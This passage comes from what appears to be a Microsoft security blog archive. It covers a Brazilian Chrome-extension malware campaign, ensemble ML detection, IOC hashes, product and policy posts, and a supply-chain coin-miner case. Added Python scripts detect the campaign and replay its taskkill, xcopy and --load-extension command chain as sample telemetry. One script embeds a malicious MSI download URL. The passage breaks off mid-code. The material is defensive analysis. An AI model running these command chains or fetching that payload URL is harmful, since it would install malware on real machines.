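    parent: str = ""   # parent process image path


def check_event(ev):
    """Return (rule_id, reason) pairs that fire on a single event."""
    hits = []
    image = ev.image.lower()
    low = ev.cmdline.lower()
    if ev.kind == "shortcut" and image.endswith("google chrome.lnk"):
        # The real shortcut targets chrome.exe; a script host or .vbs target
        # is the hijack from Figure 9.
        if re.search(r"\\(wscript|cscript)\.exe\b", low) or ".vbs" in low:
            hits.append(("chrome_shortcut_hijack",
                         f"shortcut now targets {ev.cmdline}"))
    elif ev.kind == "process":
        if image.endswith("\\chrome.exe"):
            m = LOAD_EXT.search(ev.cmdline)
            if m:
                ext_dir = m.group(1).strip('"')
                # Unpacked extensions loaded from the user profile: the
                # campaign's pattern; developers testing extensions are the
                # benign hits to tune out.
                if USER_PROFILE.match(ext_dir):
                    hits.append(("chrome_sideloaded_extension",
                                 f"extension loaded from {ext_dir}"))
        if (image.endswith("\\taskkill.exe") and "chrome.exe" in low
                and ev.parent.lower().endswith("\\cmd.exe")):
            hits.append(("batch_kills_chrome",
                         "taskkill against chrome.exe from a batch file"))
        if (image.endswith("\\xcopy.exe") and ".js" in low
                and USER_CHROME_DIR.search(low)):
            hits.append(("js_copied_into_profile_chrome_dir",
                         "xcopy of .js files into %UserProfile%\\Chrome"))
    return hits


def detect(events):
    """Run every rule over a list of events and return alerts in time order."""
    alerts = []
    for ev in sorted(events, key=lambda e: e.ts):
        for rule_id, reason in check_event(ev):
            alerts.append({"ts": ev.ts, "rule": rule_id, "reason": reason})
    return alerts


# Constructed sample telemetry reproducing the chain from the post.
SAMPLE_EVENTS = [
    Event("10:00:01", "shortcut",
          r"C:\Users\alice\Desktop\Google Chrome.lnk",
          r"C:\Windows\System32\wscript.exe C:\Users\alice\AppData\Roaming\u.vbs"),
    Event("10:05:00", "process", r"C:\Windows\System32\wscript.exe",
          r"wscript.exe C:\Users\alice\AppData\Roaming\u.vbs",
          r"C:\Windows\explorer.exe"),
    Event("10:05:01", "process", r"C:\Windows\System32\cmd.exe",
          r"cmd.exe /c C:\Users\alice\AppData\Roaming\run.bat",
          r"C:\Windows\System32\wscript.exe"),
    Event("10:05:02", "process", r"C:\Windows\System32\taskkill.exe",
          "taskkill /F /IM chrome.exe", r"C:\Windows\System32\cmd.exe"),
    Event("10:05:03", "process", r"C:\Windows\System32\xcopy.exe",
          r'xcopy "C:\Users\alice\AppData\Roaming\ext\*.js" "C:\Users\alice\Chrome\1.9.6\" /Y',
          r"C:\Windows\System32\cmd.exe"),
    Event("10:05:04", "process",
          r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          r'chrome.exe --load-extension="C:\Users\alice\Chrome\1.9.6"',
          r"C:\Windows\System32\cmd.exe"),
    # Benign launch from the Start menu: no rule should fire.
    Event("11:00:00", "process",
          r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          "chrome.exe https://www.example.com/", r"C:\Windows\explorer.exe"),
]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["ts"], alert["rule"], "-", alert["reason"])
```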

Ensemble models and the malicious JavaScript

As the attack got under way, our cloud protection service received thousands of queries about the malicious .js files, triggered by a client-side ML model that considered these files suspicious. The files were highly polymorphic, with every potential victim receiving a unique, slightly altered version of the threat:

Figure 15. Polymorphic malware

The interesting part of the story is these malicious JavaScript files. How did our ML models perform in detecting these highly obfuscated scripts as malware? Let's look at one of the instances. At the time of the query, we received metadata about the file. Here's a snippet:

Report time: 2018-06-14 01:16:03Z
SHA-256: 1f47ec030da1b7943840661e32d0cb7a59d822e400063cd17dc5afa302ab6a52
Client file type model: SUSPICIOUS
File name: vNSAml.js
File size: 28074
Extension: .js
Is PE file: FALSE
File age: 0
File prevalence: 0
Path: C:\Users\<user>\Chrome\1.9.6\vNSAml.js
Process name: xcopy.exe

Figure 16. File metadata sent during query to cloud protection service

Based on the process name, this query was sent when the .bat file copied the .js files into the %UserProfile%\Chrome directory.

Individual metadata-based classifiers evaluated the metadata and provided their probability scores. Ensemble models then used these probabilities, along with other features, to reach their own probability scores:

Model                 Probability that file is malware
Fuzzy hash 1          0.01
Fuzzy hash 2          0.06
ResearcherExpertise   0.64
Ensemble 1            0.85
Ensemble 2            0.91

Figure 17. Probability scores by individual classifiers

In this case, the second ensemble model had a strong enough score for the cloud to issue a blocking decision. Even though none of the individual classifiers in this case had a particularly strong score, the ensemble model had learned from training on millions of clean and malicious files that this combination of scores, in conjunction with a few other non-ML based features, indicated the file had a very strong likelihood of being malware.
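As an added example (not Microsoft's production model), here is a minimal logistic stacker of the kind described in the "logistic stacking" paragraph and in Figure 17: the three base-classifier probabilities plus two non-ML metadata flags (file age 0 and file prevalence 0, taken from the query metadata) feed a second-level logistic regression fitted by plain gradient descent, which is then used to score the case-study record. The training data, the choice of the two flags and the learned weights are assumptions; only the three base scores and the metadata fields come from the post.

```python
"""Logistic stacking: base-classifier probabilities become features of a
second-level logistic regression. Added example, not Microsoft's production
model; training data and the two metadata flags are constructed."""
import math
import random

# Feature order for the stacker. The first three are base-model probabilities
# (Figure 17); the last two are constructed binary flags derived from the query
# metadata (file age 0 and file prevalence 0 in the case study).
FEATURES = ("fuzzy_hash_1", "fuzzy_hash_2", "researcher_expertise",
            "file_age_is_zero", "prevalence_is_zero")

# Case-study query: the base scores reported in the post, plus both flags set.
CASE_STUDY = [0.01, 0.06, 0.64, 1.0, 1.0]


def make_training_set(n=1000, seed=7):
    """Constructed labelled records. Malware from a polymorphic campaign: fuzzy
    hashes near zero (every sample differs), moderate expert score, almost
    always brand new and never seen before. Clean files: low, scattered base
    scores, usually older and already prevalent."""
    rng = random.Random(seed)
    rows = []
    for _ in range(n // 2):
        x = [rng.uniform(0.0, 0.15), rng.uniform(0.0, 0.15),
             rng.uniform(0.45, 0.80),
             1.0 if rng.random() < 0.95 else 0.0,
             1.0 if rng.random() < 0.95 else 0.0]
        rows.append((x, 1))
    for _ in range(n // 2):
        x = [rng.uniform(0.0, 0.30), rng.uniform(0.0, 0.30),
             rng.uniform(0.0, 0.70),
             1.0 if rng.random() < 0.20 else 0.0,
             1.0 if rng.random() < 0.20 else 0.0]
        rows.append((x, 0))
    rng.shuffle(rows)
    return rows


def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))


def train_stacker(rows, epochs=400, lr=0.5):
    """Fit one weight per feature plus a bias by full-batch gradient descent on
    the log-loss; the gradient of the log-loss for one record is (p - y) * x."""
    n_feat = len(rows[0][0])
    w = [0.0] * n_feat
    b = 0.0
    m = len(rows)
    for _ in range(epochs):
        grad_w = [0.0] * n_feat
        grad_b = 0.0
        for x, y in rows:
            err = sigmoid(b + sum(wi * xi for wi, xi in zip(w, x))) - y
            for i, xi in enumerate(x):
                grad_w[i] += err * xi
            grad_b += err
        w = [wi - lr * g / m for wi, g in zip(w, grad_w)]
        b -= lr * grad_b / m
    return w, b


def stacked_probability(model, x):
    """Second-level probability that the file is malware."""
    w, b = model
    return sigmoid(b + sum(wi * xi for wi, xi in zip(w, x)))


def accuracy(model, rows, threshold=0.5):
    hits = sum((stacked_probability(model, x) >= threshold) == bool(y)
               for x, y in rows)
    return hits / len(rows)


def demo():
    rows = make_training_set()
    model = train_stacker(rows)
    return {
        "train_accuracy": accuracy(model, rows),
        "case_study": stacked_probability(model, CASE_STUDY),
        # Same weak base scores on an old, already prevalent file: without
        # the metadata corroboration the stacker should not block.
        "same_scores_old_prevalent":
            stacked_probability(model, [0.01, 0.06, 0.64, 0.0, 0.0]),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value:.3f}")
```

No single base score in the case-study record exceeds 0.64, yet the stacker's probability crosses the blocking threshold because it learned the combination with the metadata flags; the same base scores on an old, prevalent file stay below it.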

Figure 18. Ensemble models issue a blocking decision

As the queries on the malicious .js files rolled in, the cloud issued blocking decisions within a few hundred milliseconds using the ensemble model's strong probability score, enabling Windows Defender ATP's antivirus capabilities to prevent the malicious .js from running and remove it. Here is a map overlay of the actual ensemble-based blocks of the malicious JavaScript files at the time:

Figure 19. Blocks by ensemble model of malicious JavaScript used in the attack

Ensemble ML models enabled Windows Defender ATP's next-gen protection to defend thousands of customers in Brazil targeted by the unscrupulous attackers from having a potentially bad day, while ensuring the frustrated malware authors didn't hit the big pay day they were hoping for. Bom dia.


Further reading on machine learning and artificial intelligence in Windows Defender ATP

Indicators of compromise (IoCs)

  • Doc062018.zip (SHA-256: 93f488e4bb25977443ff34b593652bea06e7914564af5721727b1acdd453ced9)
  • Doc062018-2.vbs (SHA-256: 7b1b7b239f2d692d5f7f1bffa5626e8408f318b545cd2ae30f44483377a30f81)
  • zobXhz.js (SHA-256: 1f47ec030da1b7943840661e32d0cb7a59d822e400063cd17dc5afa302ab6a52)


Randy Treit, Holly Stewart, Jugal Parikh
Windows Defender Research
with special thanks to Allan Sepillo and Samuel Wakasugui



Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Categories: cybersecurity Tags:

Building on experience: a framework for cybersecurity policy

August 9th, 2018 No comments

Each year, more and more governments are developing policies to address security challenges presented by an increasingly digitized world. And to support those efforts, I'm excited today to announce the release of Microsoft's new Cybersecurity Policy Framework, a resource for policymakers that provides an overview of the building blocks of effective cybersecurity policies and that is aligned with the best practices from around the globe. Nations coming online today, and building their cybersecurity infrastructures, should not, and need not, be burdened with the stumbling blocks that characterized previous generations of cybersecurity policies. Instead, such nations should be empowered to leapfrog outdated challenges and unnecessary hurdles.

For years, Microsoft has worked with policymakers in advanced and emerging economies, and across many social and political contexts, to support the development of policies to address a wide range of cybersecurity challenges. This new publication captures and distills the important lessons learned from those years of experience partnering with governments. And as increasing numbers of countries wrestle with how to best address cybersecurity challenges, the Cybersecurity Policy Framework is an indispensable resource for the policymakers joining this work.

According to the last analysis provided by the United Nations, half of the countries on earth today either have or are developing national cybersecurity strategies. I have little doubt that in the next decade every single outstanding country will add its name to that list. And this trend highlights the importance of this new resource. The policies established today will impact how technologies are used for years to come and how safe or dangerous the online world becomes for all of us. Truly, there is no going back, only forward.

The Cybersecurity Policy Framework is not one-stop shopping for cybersecurity policymakers, but it does serve as an important umbrella document, providing a high-level overview of concepts and priorities that must be top of mind when developing an effective and resilient cybersecurity policy environment.

Specifically, this new resource outlines:

  • National strategies for cybersecurity.
  • How to establish a national cyber agency.
  • How to develop and update cybercrime laws.
  • How to develop and update critical infrastructure protections.
  • International strategies for cybersecurity.

We at Microsoft have been at this work for a long time and have developed a wide variety of resources to help those who are working to position their industries and nations to capitalize on the benefits of new technologies, so many that they can often be difficult to find! And this highlights another strength of the Cybersecurity Policy Framework: while it is not one-stop shopping, each section does provide an overview of a critical policy topic as well as links to the associated and more in-depth resources my team has developed over the years to assist policymakers. In this way, this new resource serves not only as essential, high-level guidance, but also as a key to a broader catalogue of resources built on years of experience partnering with governments around the world.

Reading through this new resource, I am proud of the work we have done in pursuit of a safer online world. Important progress has been made, and these foundational principles underscore much of today's cybersecurity discourse. However, we have, and will always have, more work to do as a result of the changes and innovations in technology always on the horizon, and their implications for cybersecurity. I'm glad to put this resource forward today to support a new generation of policymakers and also look forward to partnering with them to tackle the new challenges we will face together tomorrow.

Download your copy of the Cybersecurity Policy Framework today.

Categories: Cybersecurity Policy Tags:

Protecting the modern workplace from a wide range of undesirable software

Security is a fundamental component of the trusted and productive Windows experience that we deliver to customers through modern platforms like Windows 10 and Windows 10 in S mode. As we build intelligent security technologies that protect the modern workplace, we aim to always ensure that customers have control over their devices and experiences.

To protect our customers from the latest threats, massive amounts of security signals and threat intelligence from the Microsoft Intelligent Security Graph are processed by security analysts and intelligent systems that identify malicious and other undesirable software. Our evaluation criteria describe the characteristics and behavior of malware and potentially unwanted applications and guide the proper identification of threats. This classification of threats is reflected in the protection delivered by the Windows Defender Advanced Threat Protection (Windows Defender ATP) unified endpoint security platform.

Malware: Malicious software and unwanted software

Among the big classifications of threats, customers may be most familiar with malicious software. Malicious software might steal personal information, lock devices until a ransom is paid, use devices to send spam, or download other malicious software. Examples of these types of threats are keyloggers and ransomware. Malware can get into devices through various infection vectors, including exploits, which undermine users' choice and control of their devices. Windows Defender ATP's next generation protections detect and block these malicious programs using local machine learning models, behavior-based detection, generics and heuristics, and cloud-based machine learning models and data analytics.

Some threats, on the other hand, are classified as unwanted software. Applications that don't keep customers in control of their devices through informed choices and accessible controls are considered unwanted. Examples of unwanted behavior include modifying the browsing experience without using supported browser extensibility models, using alarming and coercive messages to scare customers into buying premium versions of software, and not providing a clear and straightforward way to install, uninstall, or disable applications. Like malicious software, unwanted software threats are malware.

A model that leverages predictive technologies, machine learning, applied science, and artificial intelligence powers Windows Defender ATP to detect and stop malware at first sight, as reflected in consistently high scores in independent antivirus tests.

Potentially unwanted applications

Some applications do not exhibit malicious behavior but can adversely impact the performance or use of devices. We classify these as potentially unwanted applications (PUA). For example, we noted the increased presence of legitimate cryptocurrency miners in enterprise environments. While some forms of cryptocurrency miners are not malicious, they may not be authorized in enterprise networks because they consume computing resources.

Unlike malicious software and unwanted software, potentially unwanted applications are not malware. Enterprise security administrators can use the PUA protection feature to block these potentially unwanted applications from downloading and installing on endpoints. PUA protection is enabled by default in Windows Defender ATP when managed through System Center Configuration Manager.

In March 2018, we started surfacing PUA protection definitions on VirusTotal. We have also updated our evaluation criteria page to describe the specific categories and descriptions of software that we classify as PUA. These are:

Browser advertising software: Software that displays advertisements or promotions or prompts the user to complete surveys for other products or services in software other than itself. This includes, for example, software that inserts advertisements in browser webpages.

Torrent software: Software that is used to create or download torrents or other files specifically used with peer-to-peer file-sharing technologies.

Cryptomining software: Software that uses your computer resources to mine cryptocurrencies.

Bundling software: Software that offers to install other software that is not digitally signed by the same entity. Also, software that offers to install other software that qualifies as PUA based on the criteria outlined in this document.

Marketing software: Software that monitors and transmits the activities of the user to applications or services other than itself for marketing research.

Evasion software: Software that actively tries to evade detection by security products, including software that behaves differently in the presence of security products.

Poor industry reputation: Software that trusted security providers detect with their security products. The security industry is dedicated to protecting customers and improving their experiences. Microsoft and other organizations in the security industry continuously exchange knowledge about files we have analyzed to provide users with the best possible protection.

Customer protection is our top priority. Windows Defender Advanced Threat Protection (Windows Defender ATP) incorporates next-generation protection, attack surface reduction, endpoint detection and response, automated investigation and remediation, and advanced hunting capabilities. We adjust, expand, and update our evaluation criteria based on customer feedback as well as new and emerging trends in the threat landscape. We encourage customers to help us identify new threats and other undesirable software by submitting programs that exhibit behaviors outlined in the evaluation criteria.


Michael Johnson

Windows Defender Research




Attending Black Hat USA 2018? Here’s what to expect from Microsoft.

Black Hat USA 2018 brings together professionals at all career levels, encouraging growth and collaboration among academia, world-class researchers, and leaders in the public and private sectors. This is an exciting time as our Microsoft researchers, partners, and security experts will showcase the latest collaborations in defense strategies for cybersecurity, highlight solutions for security vulnerabilities in applications, and bring together an ecosystem of intelligent security solutions. Our objective is to arm business, government, and consumers with deeply integrated intelligence and threat protection capabilities across platforms and products.

Security researchers play an essential role in Microsoft's security strategy and are key to community-based defense. To show our appreciation for their hard work and partnership, each year at Black Hat USA, the Microsoft Security Response Center (MSRC) highlights the contributions of these researchers through the list of Top 100 security researchers reporting to Microsoft (either directly or through a third party) during the previous 12 months. While one criterion for the ranking is the volume of fixed reports a researcher has made, the severity and impact of the reports are also very important to the ranking. Given the number of individuals reporting to Microsoft, anyone ranked among the Top 100 is among the top talent in the industry.

In addition to unveiling the Top 100 and showcasing Microsoft security solutions at Booth #652, there are a number of featured Microsoft speakers and sessions:

Join us at these sessions during the week of August 4-9, 2018 in Las Vegas and continue the discussion with us in Booth #652, where we will have product demonstrations, theatre presentations, and an opportunity to learn more about our Top 100 and meet with some of Microsoft's security experts and partners.


Protect your data in files, apps, and devices

August 2nd, 2018 No comments


This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series you'll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog, Enable your users to work securely from anywhere, anytime, across all of their devices.

Most companies focus their security solutions around users, devices, and apps, but often overlook the data that they are trying to protect. In this blog, we dig into some of the most challenging data protection scenarios our customers encounter.

How can I make sure company data is safe when employees use their own devices for work?

To help ensure your organization's data is safe on employee-owned devices, Microsoft 365 security solutions give you control and protection throughout the data lifecycle. With interoperating solutions for identity and access management, endpoint protection, information protection, and mobile device management (MDM), Microsoft 365 helps you protect your data against the complicated risks of a mobile landscape.

To build a comprehensive strategy for information protection, start by managing employee identities with Azure Active Directory (Azure AD). Azure AD gives you visibility and control over user identities, allowing you to manage what users can access. It allows your users the ability to securely sign in to business apps and access appropriate company data on their own devices.

Your employees use mobile devices for both personal and work tasks throughout the day, moving quickly among apps and files and potentially mixing up work and personal data. You want to make sure users can be productive while you prevent data loss. You also want to have the ability to protect company data even when it is accessed from devices that aren't managed by you.

You can use Microsoft Intune app protection policies (Figure 1) to help protect your company's data. Because Intune app protection policies can be used independently of any MDM solution, you can use them to protect your company's data with or without enrolling devices in a device management solution. By implementing app-level policies, you can restrict access to company resources and keep data within the purview of your IT department. These policies enable you to set parameters for how your users interact with or use data in their Intune-managed apps, for example by restricting copy-and-paste and save-as functions.

Figure 1. Intune App Protection policies allow you to restrict access to company resources.

Conditional access in Azure AD (Figure 2) lets you assign conditions that must be met in order for users to gain access. By setting conditional access policies, you can apply the right access controls under the required conditions. Configure conditional access policies to address risks based on user sign-in, network location, unmanaged devices, and client applications.

Figure 2. Conditional access lets you assign conditions that must be met in order for users to gain access.

Protect against accidental data leaks by using Windows Information Protection (WIP) to help secure business data when it leaves your employees’ devices. WIP can be configured through Intune and it allows you to restrict copy-and-paste functions, prevent unauthorized apps from accessing business data, and discriminate between corporate and personal data on the device so it can be wiped if necessary.

How can I make it easier for employees to meet my company's strict compliance requirements for data access and sharing?

Classify and protect documents and emails by applying labels with Azure Information Protection. Labels can be applied automatically by administrators who define rules and conditions, manually by users, or by a combination where users are given recommendations. The classification is identifiable regardless of where the data is stored or with whom it's shared. For example, you can configure a report document so that it can be accessed only by people in your organization, and control whether that document can be edited or is restricted to read-only, or prevent it from being printed. You can configure emails similarly, and also prevent them from being forwarded or prevent the use of the Reply All option.

How can I protect data when an employee loses their device?

If your employees use their own devices to access or store company information, you can remotely wipe data from managed business apps, like Word and SharePoint, with Intune. Company-owned devices can be managed through Intune MDM, giving you the flexibility to wipe an entire device (factory reset) or just wipe company data.

Deployment tips from our experts

Now that you know more about how Microsoft 365 security solutions can protect your data, here are three proven tips to put it all into action.

Keep your identities safe. Manage employee identities with Azure AD for visibility over user identities and control over what users can access. Configure conditional access policies to apply the right access controls to address access risks.

Manage the devices in your environment with Intune. Enable Intune to be your mobile management strategy to manage the apps that employees use to do business. You can control the apps employees can access, and you can wipe a device when someone leaves the company.

Keep your company data safe. Restrict access to company resources using Intune app protection policies to help protect your company's data. Deploy Azure Information Protection and set up your data classification, labels, and automatic policies to control access by labeling, classifying, and encrypting documents according to their level of security. Then use WIP to protect against accidental data leaks.

Plan for success with FastTrack. This valuable service comes with your subscription at no additional charge. Whether you're planning your initial rollout, needing to onboard your product, or driving end-user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, stay tuned for the white paper Protect your data in files, apps, and devices, within and across organizations coming soon!

More blog posts from this series:


How Microsoft 365 Security integrates with your broader IT ecosystem—part 2

July 31st, 2018 No comments

Today's post was coauthored by Debraj Ghosh, Senior Product Marketing Manager, and Diana Kelley, Cybersecurity Field CTO.

In part 1 of our blog series, we shared the Microsoft 365 Security strategy for integrating with the broader security community. Today, we cover the services Microsoft 365 Security offers customers to protect assets beyond the Microsoft ecosystem. These are only some examples among a broad and rich set of capabilities helping customers leverage tools beyond Microsoft's services.

Securing the cloud application ecosystem

Microsoft Cloud App Security is Microsoft's Cloud Access Security Broker (CASB), which has been fully integrated with Microsoft 365 Security services since Microsoft's acquisition of Adallom. Cloud App Security gives visibility into cloud apps and services, provides sophisticated analytics to identify and mitigate cyberthreats, and enables control over how data travels. The service integrates with Azure Active Directory and Azure Information Protection to enrich insights, strengthen security, and automate security operations.

Cloud App Security is designed to:

  • Discover Shadow IT and assess associated risks.
  • Protect data assets when they travel outside of your organization.
  • Provide real-time monitoring and control of user sessions.
  • Detect threats and anomalies.
  • Provide configuration of remediation actions.

Cloud App Security is available for over 16,000 cloud apps and leverages more than 70 parameters, including regulatory certifications, industry standards, and best practices, to assign a risk score to each app.

Figure 1. Cloud App Security dashboard.

Protecting the world's endpoints

Windows Defender Advanced Threat Protection (ATP) is Microsoft's unified endpoint security platform protecting endpoints from cyberthreats.

Windows Defender ATP is built-in and cloud-powered to:

  • Eliminate risky or unnecessary surface areas.
  • Restrict dangerous code from running.
  • Protect against file-based and file-less malware.
  • Detect and respond to advanced attacks.
  • Automatically investigate alerts and remediate complex threats in minutes.
  • Gain real-time visibility and identify ways to improve your security posture.
  • Empower SecOps to actively hunt for evasive breach activity.

Many customers want to benefit from the advanced security offered by Windows Defender ATP while having the flexibility to use various operating systems. In fact, many organizations today encourage employees to bring their own devices, providing individuals freedom of choice, but also increasing complexity for IT. Through several partnerships and cross-platform integrations (Figure 2), Windows Defender ATP reduces the complexity of securing these endpoints, providing a single pane of glass for endpoint security visibility across the entire install base.

Figure 2. Windows Defender ATP industry partners.

These partnerships enable Windows Defender ATP to protect, detect, and respond to security threats on macOS, Linux, iOS, and Android devices.

Share encrypted email with anyone on any device

Data protection is fundamental for all organizations. Email encryption is one of the most basic, yet powerful capabilities employed to protect data.

Office 365 Message Encryption comes standard in Office 365 E3 and E5 licenses enabling organizations to:

  • Protect sensitive data.
  • Control data through automatic policies or ad-hoc end user controls in Outlook (desktop and web).
  • Help meet compliance obligations for sensitive data.

For organizations that collaborate on sensitive emails with customers using consumer email services such as Gmail (Figure 3) or Yahoo, users can sign in using their Gmail or Yahoo identities, and open and read messages (including email attachments) encrypted with Office 365 Message Encryption. Once signed in, recipients can use the Office 365 Message Encryption web portal to read and collaborate on encrypted emails.

Figure 3. Office 365 encrypted email opened by a Gmail user.

The experience is completely seamless for Office 365 users, who can view and collaborate on encrypted messages in their Outlook client on any endpoint including desktop, Mac, web, iOS, or Android (Figure 4). For users not using Outlook for mobile, admins can enable other Exchange ActiveSync (EAS) mobile email clients, like the native Mail app on iOS, to receive and respond to encrypted emails.

Figure 4. Office 365 Message Encryption experience in Outlook mobile.

Digging deeper

These are only a few examples of Microsoft 365 Security services extending protection beyond the Microsoft ecosystem. You will be surprised to see the number of security offerings designed to help protect your organization, no matter which IT solutions you have in place. To get started with envisioning a plan, onboarding, and driving user adoption, go to FastTrack.microsoft.com, sign in with your subscription ID, and complete the Request for Assistance form.

In part 3 of our series, we will highlight real-world examples of Microsoft 365 Security protecting an organization's extended IT environment. Meanwhile, learn more about the depth and breadth of Microsoft 365 Security and start trials of our advanced solutions, which include:


Attack inception: Compromised supply chain within a supply chain poses new risks

A new software supply chain attack unearthed by Windows Defender Advanced Threat Protection (Windows Defender ATP) emerged as an unusual multi-tier case. Unknown attackers compromised the shared infrastructure in place between the vendor of a PDF editor application and one of its software vendor partners, making the app's legitimate installer the unsuspecting carrier of a malicious payload. The attack seemed like just another example of how cybercriminals can sneak in malware using everyday normal processes.

The plot twist: The app vendor's systems were unaffected. The compromise was traceable instead to a second software vendor that hosted additional packages used by the app during installation. This turned out to be an interesting and unique case of an attack involving "the supply chain of the supply chain".

The attackers monetized the campaign using cryptocurrency miners, going as far as using two variants for good measure, adding to an expanding list of malware attacks that install coin miners.

We estimate based on evidence from Windows Defender ATP that the compromise was active between January and March 2018 but was very limited in nature. Windows Defender ATP detected suspicious activity on a handful of targeted computers; Automated investigation automatically resolved the attack on these machines.

While the impact is limited, the attack highlighted two threat trends: (1) the escalating frequency of attacks that use software supply chains as threat vector, and (2) the increasing use of cryptocurrency miners as primary means for monetizing malware campaigns.

This new supply chain incident did not appear to involve nation-state attackers or sophisticated adversaries but appears to be instigated by petty cybercriminals trying to profit from coin mining using hijacked computing resources. This is evidence that software supply chains are becoming a risky territory and a point-of-entry preferred even by common cybercriminals.

Hunting down the software supply chain compromise

As with most software supply chain compromises, this new attack was carried out silently. It was one of numerous attacks detected and automatically remediated by Windows Defender ATP on a typical day.

While customers were immediately protected, our threat hunting team began an in-depth investigation when similar infection patterns started emerging across different sets of machines: antivirus capabilities in Windows Defender ATP were detecting and blocking a coin mining process masquerading as pagefile.sys, which was being launched by a service named xbox-service.exe. Windows Defender ATP's alert timeline showed that xbox-service.exe was installed by an installer package that was automatically downloaded from a suspicious remote server.

Figure 1. Windows Defender ATP alert for the coin miner used in this incident

A machine compromised with coin miner malware is relatively easy to remediate. However, investigating and finding the root cause of the coin miner infection without an advanced endpoint detection and response (EDR) solution like Windows Defender ATP is challenging; tracing the infection requires a rich timeline of events. In this case, Advanced hunting capabilities in Windows Defender ATP can answer three basic questions:

  • What created xbox-service.exe and pagefile.sys files on the host?
  • Why is xbox-service.exe being launched as a service with high privileges?
  • What network and process activities were seen just before xbox-service.exe was launched?

Answering these questions is painless with Windows Defender ATP. Looking at the timeline of multiple machines, our threat hunting team was able to confirm that an offending installer package (MSI) was downloaded and written onto devices through a certain PDF editor app (an alternative app to Adobe Acrobat Reader).
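
The three questions above are answered by walking a host's event timeline: find the event that wrote the file, follow the creating process up its parent chain, look for the registry write that registered it as a service, and collect the network and file activity of that lineage before the file appeared. The following is an added example of that correlation, not Microsoft's code and not Advanced hunting query syntax. The events are constructed for the example; their field names (kind, ts, pid, ppid, user, image, cmdline, path, sha256, url, key, value) are assumptions that loosely mirror EDR process, file, network and registry tables. The SHA-256 values and the download host are the ones listed in the IOC section at the end of this post.

```python
"""Answer "what created it", "why is it privileged" and "what came just
before" from a single host's event timeline.

Added example: not Microsoft's code and not Advanced hunting query syntax.
The events are constructed; field names are assumptions loosely mirroring
EDR process/file/network/registry tables. Hashes and the download host are
taken from the post's IOC section.
"""
from typing import Dict, List, Optional

# Hashes listed under "Indicators of compromise" in the post.
IOC_SHA256 = {
    "fcf64fc09fae0b0e1c01945176fce222be216844ede0e477b4053c9456ff023e": "xbox-service.exe",
    "1d596d441e5046c87f2797e47aaa1b6e1ac0eabb63e119f7ffb32695c20c952b": "pagefile.sys",
    "a69a40e9f57f029c056d817fe5ce2b3a1099235ecbb0bcc33207c9cff5e8ffd0": "malicious font MSI",
}
SYSTEM = "NT AUTHORITY\\SYSTEM"
SERVICES_KEY = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\"

# Constructed single-host timeline; ts is seconds. The hop through the
# Windows Installer service is collapsed so msiexec's parent is the setup.
EVENTS: List[Dict] = [
    {"kind": "process", "ts": 0, "pid": 4, "ppid": 0, "user": SYSTEM,
     "image": "services.exe", "cmdline": "services.exe"},
    {"kind": "process", "ts": 100, "pid": 1, "ppid": 0, "user": "CORP\\alice",
     "image": "PdfEditorSetup.exe", "cmdline": "PdfEditorSetup.exe /silent"},
    {"kind": "network", "ts": 101, "pid": 1,
     "url": "http://vps11240.hyperhost.name/escape/asianfonts.msi"},
    {"kind": "file", "ts": 102, "pid": 1, "path": "C:\\Temp\\asianfonts.msi",
     "sha256": "a69a40e9f57f029c056d817fe5ce2b3a1099235ecbb0bcc33207c9cff5e8ffd0"},
    {"kind": "process", "ts": 103, "pid": 2, "ppid": 1, "user": SYSTEM,
     "image": "msiexec.exe", "cmdline": "msiexec.exe /i C:\\Temp\\asianfonts.msi /qn"},
    {"kind": "file", "ts": 104, "pid": 2, "path": "C:\\Windows\\System32\\xbox-service.exe",
     "sha256": "fcf64fc09fae0b0e1c01945176fce222be216844ede0e477b4053c9456ff023e"},
    {"kind": "registry", "ts": 105, "pid": 2, "key": SERVICES_KEY + "xbox-service\\ImagePath",
     "value": "C:\\Windows\\System32\\xbox-service.exe"},
    {"kind": "process", "ts": 110, "pid": 3, "ppid": 4, "user": SYSTEM,
     "image": "xbox-service.exe", "cmdline": "xbox-service.exe"},
    {"kind": "file", "ts": 111, "pid": 3, "path": "C:\\Windows\\Temp\\pagefile.sys",
     "sha256": "1d596d441e5046c87f2797e47aaa1b6e1ac0eabb63e119f7ffb32695c20c952b"},
]


def _processes(events: List[Dict]) -> Dict[int, Dict]:
    return {e["pid"]: e for e in events if e["kind"] == "process"}


def file_creator(events: List[Dict], filename: str) -> Optional[Dict]:
    """First file-creation event whose path ends with the given file name."""
    suffix = "\\" + filename.lower()
    for e in events:
        if e["kind"] == "file" and e["path"].lower().endswith(suffix):
            return e
    return None


def lineage(events: List[Dict], pid: int) -> List[int]:
    """pid followed by its ancestors, stopping when a parent is not in the data."""
    procs, chain = _processes(events), []
    while pid in procs:
        chain.append(pid)
        pid = procs[pid]["ppid"]
    return chain


def activity_before(events: List[Dict], ts: int, pids: List[int], kind: str) -> List[Dict]:
    """Events of one kind, from the given processes, that happened before ts."""
    return [e for e in events if e["kind"] == kind and e["ts"] < ts and e["pid"] in pids]


def service_registration(events: List[Dict], filename: str) -> Optional[Dict]:
    """Registry write that points a service ImagePath at the file."""
    for e in events:
        if (e["kind"] == "registry" and e["key"].startswith(SERVICES_KEY)
                and e["value"].lower().endswith(filename.lower())):
            return e
    return None


def investigate(events: List[Dict], filename: str) -> Dict:
    """Who created the file, how it got its privileges, and what preceded it."""
    created = file_creator(events, filename)
    if created is None:
        return {"found": False}
    procs = _processes(events)
    chain = lineage(events, created["pid"])
    svc = service_registration(events, filename)
    return {
        "found": True,
        "ioc_match": created["sha256"] in IOC_SHA256,
        "created_by": procs[created["pid"]]["image"],
        "created_by_user": procs[created["pid"]]["user"],
        "ancestry": [procs[p]["image"] for p in chain],
        "service_registered_by": procs[svc["pid"]]["image"] if svc else None,
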